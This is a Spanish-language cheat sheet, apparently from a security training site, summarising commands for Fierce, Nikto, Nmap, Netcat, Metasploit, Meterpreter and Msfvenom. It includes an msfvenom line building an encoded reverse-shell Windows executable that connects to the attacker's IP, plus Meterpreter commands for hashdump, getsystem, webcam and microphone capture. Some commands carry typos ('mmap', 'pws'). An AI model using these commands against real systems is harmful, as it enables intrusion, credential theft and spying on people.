Herramientas y conceptos básicos para el análisis de vulnerabilidades


Fierce

Es un escaner de dominio, ayuda a encontrar servidores DNS, transferencias de zona, subredes y hosts de cualquier dominio destino.


                  fierce --domain <<dominio>>
                

Nikto

Es un escaner de vulnerabilidades.


                  nikto -h <<host>> -p <<puertos>>
                

Whatportis

Permite encontrar puertos asociados a servicios.


                  whatportis <<servicio>> (Ej. redis)
                

Ó que servicio está asociado al número de puerto.


                  whatportis <<puerto>> (Ej. 5432)
                

Nmap

Es una herramienta para exploración de red.


                  mmap <<host>>
                

Opciones

  1. -Pn (No hacer ping)
  2. -sV (Detección de versiones de los servicios)
  3. -O (Detección del sistema operativo)
  4. -sn (Escaneo rápido - ping scan)
  5. -script=script
  6. -D <<dominio>> (Ej. google.com)

Grupos de scripts

  1. auth
  2. default
  3. discovery
  4. external (Hacia servicios públicos)
  5. malware
  6. safe (Pentesting)
  7. vuln
  8. all (Corre todo)
  9. intrusive (Va a tratar de aprovechar las vulnerabilidades)

Netcat

Comprobar la disponibilidad de puertos e información del sistema.


                  nc -vv <<host>> <<puerto>>
                

Netstat

Herramienta para monitorear conexiones de red entrantes y salientes.

Listar todos los puertos TCP y UDP


                  netstat -a
                

Listar todas las conexiones de puertos de escucha activas.


                  netstat -l
                

Metasploit

Es una herramienta para desarrollar y ejecutar exploits.

  1. Exploit: Es una vulnerabilidad.
  2. Payload: Es una carga que se ejecuta en una vulnerabilidad.

Iniciar PostgreSQL


                  /etc/init.d/postgresql start
                

Reiniciar DB de MSF


                  cd /usr/share/metasploit-framework
                  ./msfdb reinit
                

Estatus de conexión DB MSF


                  db_status
                

Iniciar MSF


                  msfconsole
                

Options

  1. search <<vuln>> (Ej. ms17-010)
  2. show exploits
  3. use <<url exploit>>
  4. show info
  5. show options
  6. set <<option>>
  7. unset <<option>>
  8. run (Correr scan)
  9. exploit (Correr exploit)
  10. show payloads
  11. set payload <<url payload>>
  12. exploit -j -z (Explotar en segundo plano)
  13. sessions -l
  14. sessions -i <<ID session>> (numérico)

Meterpreter

Es un payload que se ejecuta en memoria a bajo nivel, tiene opciones y subcomandos propios. (Es un interprete de comandos).

Comandos más utilizados:

cd, rm, rmdir, pws, ls, upload, download, cat, edit, del, mkdir, search.

Webcam commands

record_mic, webcam_list, webcam_snap, screengrab.

System commands

getsystem, hashdump.

Msfvenom

Es una herramienta para generar shellcodes utilizando diferentes payloads.


                  msfvenom -p <<url payload>> LHOST= <<Mi IP>> LPORT= <<4445>> -f <<formato>> > windows.exe
                

Arquitectura

--arch x64, x86

Encoder

-e x86/shikata-ga-nai -i 7 //-i número de iteraciones

Plataforma

--platform windows

Forcsec
Todos los derechos reservados


Al navegar y hacer uso de nuestros servicios aceptas los términos y condiciones.